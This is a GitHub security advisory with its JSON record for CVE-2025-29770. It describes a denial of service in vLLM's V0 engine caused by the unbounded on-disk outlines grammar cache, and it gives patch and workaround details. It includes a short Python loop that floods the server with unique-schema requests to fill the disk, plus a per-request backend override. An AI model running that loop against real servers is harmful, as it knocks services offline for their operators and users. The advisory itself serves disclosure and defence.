GHSA-mgrm-fgjv-mhv8
Vulnerability from GitHub
Published: 2025-03-19 15:52
Modified: 2025-03-20 18:55
Summary: vLLM denial of service via outlines unbounded cache on disk
Details

Impact

The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem, and this cache has been enabled by default in vLLM. Outlines is also available by default through the OpenAI-compatible API server.

The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. Because of the potential for abuse, vLLM should have this cache off by default and allow administrators to opt in.

A malicious user can send a stream of very short decoding requests, each with a unique schema, causing a new entry to be added to the cache for every request. If the filesystem runs out of space, this results in a denial of service.
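
As an illustration of the abuse pattern, the following is a minimal sketch against the OpenAI-compatible API server. It assumes the openai Python client, a server listening on localhost:8000, and vLLM's guided_json request field; the model name and loop bound are placeholders, not taken from this advisory.

# Sketch only: each request carries a unique JSON schema, so outlines compiles
# a new grammar and writes a new entry to its on-disk cache.
from openai import OpenAI

client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")

for i in range(100_000):  # arbitrary bound; the attacker just keeps going
    schema = {
        "type": "object",
        "properties": {f"field_{i}": {"type": "string"}},
        "required": [f"field_{i}"],
    }
    client.chat.completions.create(
        model="my-model",                    # placeholder model name
        messages=[{"role": "user", "content": "hi"}],
        max_tokens=1,                        # keep each request cheap
        extra_body={"guided_json": schema},  # triggers grammar compilation
    )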

Note that even if vLLM is configured to use a different backend by default, it is still possible to select outlines on a per-request basis using the guided_decoding_backend key in the extra_body field of the request.
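
The per-request selection looks like the following hedged sketch; guided_decoding_backend is the key named in this advisory, while the rest of the call mirrors the sketch above and uses placeholder values.

# Sketch only: forcing the outlines backend for a single request, even when the
# server-wide default is a different structured-output backend.
from openai import OpenAI

client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")
client.chat.completions.create(
    model="my-model",
    messages=[{"role": "user", "content": "hi"}],
    max_tokens=1,
    extra_body={
        "guided_json": {"type": "object"},      # any structured-output request
        "guided_decoding_backend": "outlines",  # per-request backend override
    },
)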

This issue applies to the V0 engine only. The V1 engine is not affected.

Patches

  • https://github.com/vllm-project/vllm/pull/14837

The fix is to disable this cache by default since it does not provide an option to limit its size. If you want to use this cache anyway, you may set the VLLM_V0_USE_OUTLINES_CACHE environment variable to 1.
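
For administrators who still want the cache on a fixed release, the following is a minimal sketch of the opt-in using vLLM's offline LLM API; the model name is a placeholder, and setting the variable before importing vLLM is assumed to be the safest ordering. The variable can equally be exported in the environment of the process that launches the OpenAI-compatible server.

# Sketch only: explicitly opting back into the outlines disk cache.
import os
os.environ["VLLM_V0_USE_OUTLINES_CACHE"] = "1"  # off by default after the fix

from vllm import LLM, SamplingParams  # offline inference API

llm = LLM(model="Qwen/Qwen2.5-0.5B-Instruct")  # placeholder model
print(llm.generate(["Hello"], SamplingParams(max_tokens=8)))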

Workarounds

There is no way to work around this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI-compatible API server.

References



{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "vllm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-29770"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-19T15:52:26Z",
    "nvd_published_at": "2025-03-19T16:15:31Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\nThe [outlines](https://dottxt-ai.github.io/outlines/latest/) library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server.\n\nThe affected code in vLLM is [vllm/model_executor/guided_decoding/outlines_logits_processors.py](https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py), which unconditionally uses the cache from outlines. vLLM should have this off by default and allow administrators to opt-in due to the potential for abuse.\n\nA malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space.\n\nNote that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the `guided_decoding_backend` key of the `extra_body` field of the request.\n\nThis issue applies to the V0 engine only. The V1 engine is not affected.\n\n### Patches\n\n* https://github.com/vllm-project/vllm/pull/14837\n\nThe fix is to disable this cache by default since it does not provide an option to limit its size. If you want to use this cache anyway, you may set the `VLLM_V0_USE_OUTLINES_CACHE` environment variable to `1`.\n\n### Workarounds\n\nThere is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.\n\n### References",
  "id": "GHSA-mgrm-fgjv-mhv8",
  "modified": "2025-03-20T18:55:45Z",
  "published": "2025-03-19T15:52:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29770"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/pull/14837"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vllm-project/vllm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vLLM denial of service via outlines unbounded cache on disk"
}

